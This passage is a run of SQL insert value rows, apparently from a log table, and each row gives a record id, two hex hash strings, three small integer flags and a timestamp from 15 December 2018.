(38708, 'd8a7695ca3cc6b41205019b10ecf5e9f', '33089a3b34e40302', 0, 2, 1, '2018-12-15 05:50:04'),
(38709, '153b6b0ce22ec4f8110dd434ed048e8a', 'f556605047b35dd8', 0, 2, 1, '2018-12-15 05:51:16'),
(38710, '153b6b0ce22ec4f8110dd434ed048e8a', 'f556605047b35dd8', 0, 2, 1, '2018-12-15 05:51:51'),
(38711, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 05:51:56'),
(38712, '35bb9c182e04e8b4899df7817aaf3e40', '62d3627a2e72cb15', 0, 2, 1, '2018-12-15 05:52:15'),
(38713, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 05:53:06'),
(38714, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 05:54:11'),
(38715, 'da1982b76378e1e4c6dbdb5efd4b94bf', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-15 05:54:58'),
(38716, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 05:56:10'),
(38717, 'd47148fb18e2b775d81e9670c91cb2ee', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-15 05:56:11'),
(38718, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 05:56:54'),
(38719, '2c1c69c7a0c8bd728a7ba5d64f7bb521', 'ef719fb6bfd6cee0', 0, 2, 1, '2018-12-15 06:00:00'),
(38720, '2c1c69c7a0c8bd728a7ba5d64f7bb521', 'ef719fb6bfd6cee0', 0, 2, 1, '2018-12-15 06:00:07'),
(38721, 'bfb1ae9931a1861fca69585f91f78ac1', '55df53aae0202a52', 0, 2, 1, '2018-12-15 06:00:15'),
(38722, 'bfb1ae9931a1861fca69585f91f78ac1', '55df53aae0202a52', 0, 2, 1, '2018-12-15 06:00:42'),
(38723, '22631a1eb06371f3392914b6b0bf5ff4', 'fc794f0a80972404', 0, 2, 1, '2018-12-15 06:01:15'),
(38724, 'a80c3a98dac08133fa621e6f1b765c2c', '779493fa905c6d91', 0, 2, 1, '2018-12-15 06:01:21'),
(38725, 'a80c3a98dac08133fa621e6f1b765c2c', '779493fa905c6d91', 0, 2, 1, '2018-12-15 06:01:33'),
(38726, '70d9cf10038978e8b8b6f82d6eacd7ff', '50d02461c9e1908b', 0, 2, 1, '2018-12-15 06:01:56'),
(38727, 'a80c3a98dac08133fa621e6f1b765c2c', '779493fa905c6d91', 0, 2, 1, '2018-12-15 06:02:25'),
(38728, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 06:02:32'),
(38729, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 06:03:29'),
(38730, '0d8e1e2cfd183ededcf9f849a8bd8215', 'c020abbb40884763', 0, 2, 1, '2018-12-15 06:03:39'),
(38731, 'b3578ae0cc31f182cffb6a6115a1305c', '618a8dda34a6c476', 0, 2, 1, '2018-12-15 06:03:54'),
(38732, '2b59b175470609bb870388e5aa8d1021', '84f7aa5adbe261e7', 0, 2, 1, '2018-12-15 06:03:54'),
(38733, '8fdb618289f4c2f7489c015a81212683', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 06:04:55'),
(38734, 'eba63e283f9abbb72bb291a59f060464', '544792a504897a83', 0, 2, 1, '2018-12-15 06:05:33'),
(38735, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:06:01'),
(38736, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:07:47'),
(38737, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:08:22'),
(38738, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:08:31'),
(38739, '35bb9c182e04e8b4899df7817aaf3e40', '62d3627a2e72cb15', 0, 2, 1, '2018-12-15 06:09:06'),
(38740, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:09:35'),
(38741, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 06:10:12'),
(38742, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:10:52'),
(38743, 'cbf2bdf5f5e057ab7ddb0794e60e399f', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-15 06:11:01'),
(38744, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:11:04'),
(38745, '67de7adeb4817ba320d690a5810bbf3b', '9113ca554f25f876', 0, 2, 1, '2018-12-15 06:11:15'),
(38746, 'efb8bdd73748f32099ff504c49e39370', 'f48f21345f609603', 0, 2, 1, '2018-12-15 06:11:46'),
(38747, 'b2d204d50e3d8a3137810892ed721504', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 06:11:46'),
(38748, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 06:13:11'),
(38749, '7923aa4cd43098096afdba70f2f329ea', '1fe68226bb896748', 0, 2, 1, '2018-12-15 06:14:02'),
(38750, '47db4b56d99d2fd1280f33359e160ad0', '1267050fbb458315', 0, 2, 1, '2018-12-15 06:14:41'),
(38751, '800d4fd74ba2212587dc9ef9275a9b7b', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:16:13'),
(38752, '800d4fd74ba2212587dc9ef9275a9b7b', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:16:33'),
(38753, 'ae0b4b8a295702431f004173428f1fe0', 'c2a9c7ebb7169f9c', 0, 2, 1, '2018-12-15 06:17:07'),
(38754, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-15 06:19:47'),
(38755, '3994b8cf349c55512db6ed03baac5294', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-15 06:20:06'),
(38756, '721f5f2b575e35f42fc813b24cf1dc3c', '4033acf80dbe370e', 0, 2, 1, '2018-12-15 06:20:22'),
(38757, '05020d1a8c79a2ab061982438756eb38', '40b2119a49041543', 0, 2, 1, '2018-12-15 06:22:53'),
(38758, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:23:18'),
(38759, '800d4fd74ba2212587dc9ef9275a9b7b', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:24:22'),
(38760, '721f5f2b575e35f42fc813b24cf1dc3c', '4033acf80dbe370e', 0, 2, 1, '2018-12-15 06:24:50'),
(38761, '800d4fd74ba2212587dc9ef9275a9b7b', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:25:11'),
(38762, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2018-12-15 06:27:12'),
(38763, '3ec43e78620f4782c82f8f93c1507f9a', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 06:27:13'),
(38764, '3ec43e78620f4782c82f8f93c1507f9a', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 06:28:19'),
(38765, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:29:02'),
(38766, 'a80c3a98dac08133fa621e6f1b765c2c', '779493fa905c6d91', 0, 2, 1, '2018-12-15 06:29:41'),
(38767, 'b2180de2ad651a4caaeb83d5afc84f6d', 'd3902e08ef0206de', 0, 2, 1, '2018-12-15 06:31:58'),
(38768, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2018-12-15 06:32:00'),
(38769, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 06:32:02'),
(38770, 'cbf2bdf5f5e057ab7ddb0794e60e399f', 'b5aa5bf58fedb8e0', 0, 2, 1, '2018-12-15 06:32:07'),
(38771, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 06:32:26'),
(38772, 'b2180de2ad651a4caaeb83d5afc84f6d', 'd3902e08ef0206de', 0, 2, 1, '2018-12-15 06:32:33'),
(38773, '70d9cf10038978e8b8b6f82d6eacd7ff', '50d02461c9e1908b', 0, 2, 1, '2018-12-15 06:32:33'),
(38774, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 06:32:40'),
(38775, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:32:40'),
(38776, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 06:33:15'),
(38777, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 06:33:48'),
(38778, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 06:34:17'),
(38779, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 06:34:56'),
(38780, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-15 06:36:17'),
(38781, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 06:39:31'),
(38782, 'af34d462418215a4effd017bbcc35d85', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:40:19'),
(38783, 'fe95139bc293076e57650ef222f55aba', '4c07673592205f17', 0, 2, 1, '2018-12-15 06:40:36'),
(38784, '35bb9c182e04e8b4899df7817aaf3e40', '62d3627a2e72cb15', 0, 2, 1, '2018-12-15 06:41:47'),
(38785, '58e66183bd7fe2b1f97af397dcf1e298', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 06:41:50'),
(38786, '2fd11a0d6641b4109aea6e9b0c8ea3d5', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-15 06:42:17'),
(38787, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 06:42:40'),
(38788, '9a0d66ade36fcd5b6feca5061ee970a7', 'c962ab3e75718885', 0, 2, 1, '2018-12-15 06:43:10'),
(38789, '7d679c24c23affdd2ef61ac8b8594947', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 06:44:09'),
(38790, 'af34d462418215a4effd017bbcc35d85', '84c73015e9e28e8a', 0, 2, 1, '2018-12-15 06:45:05'),
(38791, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 06:46:45'),
(38792, '3e16ec5a8b15b57a523f26ee4d901517', '6e117bd555667400', 0, 2, 1, '2018-12-15 06:47:57'),
(38793, '7444e5663bea1758328fcfc8e5f94cf5', 'd67839a385270e7b', 0, 2, 1, '2018-12-15 06:48:40'),
(38794, '98f1b46b68527183e186913097bfc1aa', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 06:51:37'),
(38795, '3994b8cf349c55512db6ed03baac5294', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-15 06:54:13'),
(38796, '7d679c24c23affdd2ef61ac8b8594947', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 06:55:13'),
(38797, '366ff8d36c1ee6cb1f69b0c1e032d950', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 06:56:33'),
(38798, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 06:56:49'),
(38799, 'b2708175c5639f3629a606744fddda97', '0c844fefc01db064', 0, 2, 1, '2018-12-15 06:58:59'),
(38800, '3ec43e78620f4782c82f8f93c1507f9a', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 06:59:40'),
(38801, '3ec43e78620f4782c82f8f93c1507f9a', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 06:59:54'),
(38802, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 07:01:04'),
(38803, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 07:01:38'),
(38804, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 07:02:36'),
(38805, '7d679c24c23affdd2ef61ac8b8594947', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 07:03:34'),
(38806, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 07:03:42'),
(38807, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 07:04:02'),
(38808, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-15 07:04:57'),
(38809, '0f211e9fa142072f06f4c0bf9b8ff279', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:09:43'),
(38810, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-15 07:10:20'),
(38811, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:11:18'),
(38812, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:11:43'),
(38813, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:11:57'),
(38814, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:12:06'),
(38815, 'ed5c46e58b4bffec3d07e305e575847b', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 07:12:19'),
(38816, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:12:22'),
(38817, 'ed5c46e58b4bffec3d07e305e575847b', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 07:12:29'),
(38818, '6ed47e6881fe31a6e328960e39ff932f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-15 07:12:41'),
(38819, 'ed5c46e58b4bffec3d07e305e575847b', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 07:13:52'),
(38820, '0f211e9fa142072f06f4c0bf9b8ff279', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:16:08'),
(38821, '52310f0181b6958810659726ebc582bc', '779493fa905c6d91', 0, 2, 1, '2018-12-15 07:31:17'),
(38822, '0f211e9fa142072f06f4c0bf9b8ff279', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:33:59'),
(38823, '3f59411b4894b3c6e85d4dcd934be3e2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:39:04'),
(38824, '3f59411b4894b3c6e85d4dcd934be3e2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:39:37'),
(38825, '3f59411b4894b3c6e85d4dcd934be3e2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:39:53'),
(38826, '3f59411b4894b3c6e85d4dcd934be3e2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 07:40:12'),
(38827, '580109e2645318c08d0652c18940a46c', 'f5895db776f13305', 0, 2, 1, '2018-12-15 07:49:06'),
(38828, '09560ad9d55861046a81583d42bac2fb', 'bb209b9208422015', 0, 2, 1, '2018-12-15 07:59:21'),
(38829, '09560ad9d55861046a81583d42bac2fb', 'bb209b9208422015', 0, 2, 1, '2018-12-15 07:59:53'),
(38830, 'bd5811e3cc9883da397d29407d5e76f2', 'c0d620ee8725a926', 0, 2, 1, '2018-12-15 08:06:08'),
(38831, 'b1ff8a07fd89ce497750aa250c6b2146', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 08:16:30'),
(38832, '4faacdffbf7dbb1283908b0498ea6efe', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-15 08:19:43'),
(38833, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 08:25:35'),
(38834, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 08:25:43'),
(38835, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 08:27:23'),
(38836, 'b1ff8a07fd89ce497750aa250c6b2146', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 08:42:11'),
(38837, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-15 08:44:13'),
(38838, '0d479c9104c78c59c9d3718d86a39119', '9ade7cf8dbbc901c', 0, 2, 1, '2018-12-15 08:45:48'),
(38839, '795c67bbfdd7ad5a794467a9812fccf0', '1ea85266413c121b', 0, 2, 1, '2018-12-15 08:48:47'),
(38840, '0014e883ecd769b7fe3382ecdee5028b', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 08:52:15'),
(38841, '0014e883ecd769b7fe3382ecdee5028b', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 08:52:59'),
(38842, '1a29e52c5c59b6a4d8c3c46811c3fd13', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 08:53:34'),
(38843, 'bd5811e3cc9883da397d29407d5e76f2', 'c0d620ee8725a926', 0, 2, 1, '2018-12-15 08:53:42'),
(38844, 'c1f07458901e3aae3f6d1fa65cfc2843', 'b5569667369b4c76', 0, 2, 1, '2018-12-15 08:58:39'),
(38845, 'c1f07458901e3aae3f6d1fa65cfc2843', 'b5569667369b4c76', 0, 2, 1, '2018-12-15 08:59:06'),
(38846, '7923aa4cd43098096afdba70f2f329ea', '1fe68226bb896748', 0, 2, 1, '2018-12-15 09:01:36'),
(38847, 'f35e4455969de03e3a6d54ed31751e5a', '32d0a21ed89192dd', 0, 2, 1, '2018-12-15 09:01:55'),
(38848, '0a2e78738dbd83a591313d19193395d0', '9ead839ed439c136', 0, 2, 1, '2018-12-15 09:02:04'),
(38849, 'f35e4455969de03e3a6d54ed31751e5a', '32d0a21ed89192dd', 0, 2, 1, '2018-12-15 09:02:11'),
(38850, '0246faa4c634ef9c233a1f7352fd7c31', '0eb760e081a4af82', 0, 2, 1, '2018-12-15 09:02:24'),
(38851, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-15 09:02:37'),
(38852, '7923aa4cd43098096afdba70f2f329ea', '1fe68226bb896748', 0, 2, 1, '2018-12-15 09:03:03'),
(38853, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 09:03:06'),
(38854, '0246faa4c634ef9c233a1f7352fd7c31', '0eb760e081a4af82', 0, 2, 1, '2018-12-15 09:03:26'),
(38855, 'c1f07458901e3aae3f6d1fa65cfc2843', 'b5569667369b4c76', 0, 2, 1, '2018-12-15 09:03:48'),
(38856, '7f9e5d37b6445579ac07ca8c003414ad', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 09:04:00'),
(38857, '0246faa4c634ef9c233a1f7352fd7c31', '0eb760e081a4af82', 0, 2, 1, '2018-12-15 09:04:03'),
(38858, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:04:13'),
(38859, '0014e883ecd769b7fe3382ecdee5028b', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 09:04:32'),
(38860, '0014e883ecd769b7fe3382ecdee5028b', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 09:05:21'),
(38861, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 09:05:45'),
(38862, '7923aa4cd43098096afdba70f2f329ea', '1fe68226bb896748', 0, 2, 1, '2018-12-15 09:05:45'),
(38863, '7f9e5d37b6445579ac07ca8c003414ad', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 09:05:47'),
(38864, '7f9e5d37b6445579ac07ca8c003414ad', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 09:06:21'),
(38865, 'b8851d32c72f0d79af3d57f94a6788df', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 09:06:45'),
(38866, '4faacdffbf7dbb1283908b0498ea6efe', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-15 09:06:59'),
(38867, 'b8851d32c72f0d79af3d57f94a6788df', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 09:07:06'),
(38868, 'e910eb0a2ac3ff150aca30713472f104', 'f48f21345f609603', 0, 2, 1, '2018-12-15 09:07:31'),
(38869, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 09:07:54'),
(38870, '0014e883ecd769b7fe3382ecdee5028b', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 09:08:11'),
(38871, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:10:00'),
(38872, 'e6685bd48b2505c5fd8046933aa9790e', '1de090ec808c88cc', 0, 2, 1, '2018-12-15 09:10:00'),
(38873, '167fbc295de79a59b47646a5b3e258e6', 'a429f8ab17b5e52a', 0, 2, 1, '2018-12-15 09:10:25'),
(38874, '4faacdffbf7dbb1283908b0498ea6efe', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-15 09:10:43'),
(38875, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 09:10:53'),
(38876, '4faacdffbf7dbb1283908b0498ea6efe', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-15 09:11:05'),
(38877, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:11:19'),
(38878, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 09:11:22'),
(38879, '291081b4a59770c18c0cffe60c1e34be', '4fa83dd66d754b91', 0, 2, 1, '2018-12-15 09:11:25'),
(38880, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 09:11:40'),
(38881, '70a55d4cbef6eed76dcb998b469b9d8f', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 09:11:51'),
(38882, '7f9e5d37b6445579ac07ca8c003414ad', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-15 09:11:54'),
(38883, '78612aa722242017cd82d9ac194d05e4', '3b4446abb707e8c0', 0, 2, 1, '2018-12-15 09:11:55'),
(38884, 'e3975902e2e900b95d218607425d2be0', 'f3f3de8bf97f7b07', 0, 2, 1, '2018-12-15 09:12:17'),
(38885, 'de9cffeb3089695242b923e54a69ac37', '9a1a9db6d4db8522', 0, 2, 1, '2018-12-15 09:12:28'),
(38886, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:12:49'),
(38887, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 09:12:53'),
(38888, '291081b4a59770c18c0cffe60c1e34be', '4fa83dd66d754b91', 0, 2, 1, '2018-12-15 09:12:55'),
(38889, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-15 09:13:04'),
(38890, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:13:09'),
(38891, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-15 09:13:19'),
(38892, 'a5e67cbe02037be106224cbe63214168', 'fbf0576065758144', 0, 2, 1, '2018-12-15 09:13:32'),
(38893, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-15 09:13:44'),
(38894, 'c1f07458901e3aae3f6d1fa65cfc2843', 'b5569667369b4c76', 0, 2, 1, '2018-12-15 09:14:10'),
(38895, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-15 09:14:32'),
(38896, '15c581beadd21f8ae0fcf7f2e882c7fd', '721a08095e6444d9', 0, 2, 1, '2018-12-15 09:14:37'),
(38897, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:14:58'),
(38898, '15c581beadd21f8ae0fcf7f2e882c7fd', '721a08095e6444d9', 0, 2, 1, '2018-12-15 09:15:06'),
(38899, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:15:18'),
(38900, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-15 09:15:24'),
(38901, 'cedd8e8f5803ae538f1fc1b344931ddf', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-15 09:15:51'),
(38902, 'b8851d32c72f0d79af3d57f94a6788df', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 09:15:54'),
(38903, 'b8851d32c72f0d79af3d57f94a6788df', 'df27b9a2919a8206', 0, 2, 1, '2018-12-15 09:16:15'),
(38904, '9bba0b175d418baa9a3fd9326d914d06', '37aba9e9017b3143', 0, 2, 1, '2018-12-15 09:16:58'),
(38905, 'a08658ab49cd1a2503be5f48840a5345', '1e12a002f8a00bf7', 0, 2, 1, '2018-12-15 09:16:58'),
(38906, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-15 09:17:01'),
(38907, 'a5e67cbe02037be106224cbe63214168', 'fbf0576065758144', 0, 2, 1, '2018-12-15 09:17:13'),
(38908, 'aad9d1178cb84111414d3d9899c64439', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-15 09:17:15'),
(38909, '2ef32fbe0cd27c3ec0c4b21157c32d95', 'f52a42a05787db8d', 0, 2, 1, '2018-12-15 09:17:27'),
(38910, '7d679c24c23affdd2ef61ac8b8594947', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-15 09:17:27'),
(38911, 'ed6dd7289ce7a26e4c9250334b6eef80', 'd6e1f3c4852703f2', 0, 2, 1, '2018-12-15 09:17:34'),
(38912, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-15 09:17:36'),
(38913, 'e910eb0a2ac3ff150aca30713472f104', 'f48f21345f609603', 0, 2, 1, '2018-12-15 09:17:36'),
(38914, 'e910eb0a2ac3ff150aca30713472f104', 'f48f21345f609603', 0, 2, 1, '2018-12-15 09:17:55'),
(38915, 'ed6dd7289ce7a26e4c9250334b6eef80', 'd6e1f3c4852703f2', 0, 2, 1, '2018-12-15 09:18:19'),
(38916, 'cedb8e487617df6d11edb42469e85d58', 'ee048a80ed202af2', 0, 2, 1, '2018-12-15 09:18:24'),
(38917, 'ecd67f6383e129f8c068be1ef90f132d', 'c020abbb40884763', 0, 2, 1, '2018-12-15 09:18:29'),
(38918, '0a327eadd4e8616109029854114777e5', '74aba437eea39f30', 0, 2, 1, '2018-12-15 09:18:32'),
(38919, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 09:19:19'),
(38920, '22e04744d261d977ce62f75e0ea491f2', '21f5d356a659133c', 0, 2, 1, '2018-12-15 09:19:21'),
(38921, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 09:19:26'),
(38922, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-15 09:19:51'),
(38923, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 09:19:57'),
(38924, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2018-12-15 09:20:02'),
(38925, 'ed6dd7289ce7a26e4c9250334b6eef80', 'd6e1f3c4852703f2', 0, 2, 1, '2018-12-15 09:20:07'),
(38926, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 09:20:41'),
(38927, 'a5e67cbe02037be106224cbe63214168', 'fbf0576065758144', 0, 2, 1, '2018-12-15 09:20:58'),
(38928, '71504ae8293c96705e3dcb561f7af2c5', '257e4f544151a962', 0, 2, 1, '2018-12-15 09:21:09'),
(38929, 'e910eb0a2ac3ff150aca30713472f104', 'f48f21345f609603', 0, 2, 1, '2018-12-15 09:21:14'),
(38930, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 09:21:25'),
(38931, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2018-12-15 09:21:42'),
(38932, 'ed6dd7289ce7a26e4c9250334b6eef80', 'd6e1f3c4852703f2', 0, 2, 1, '2018-12-15 09:22:02'),
(38933, 'e910eb0a2ac3ff150aca30713472f104', 'f48f21345f609603', 0, 2, 1, '2018-12-15 09:22:06'),
(38934, 'ecd67f6383e129f8c068be1ef90f132d', 'c020abbb40884763', 0, 2, 1, '2018-12-15 09:22:15'),
(38935, '7b826dde92b7490bd4ce6e28db64438f', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 09:22:21'),
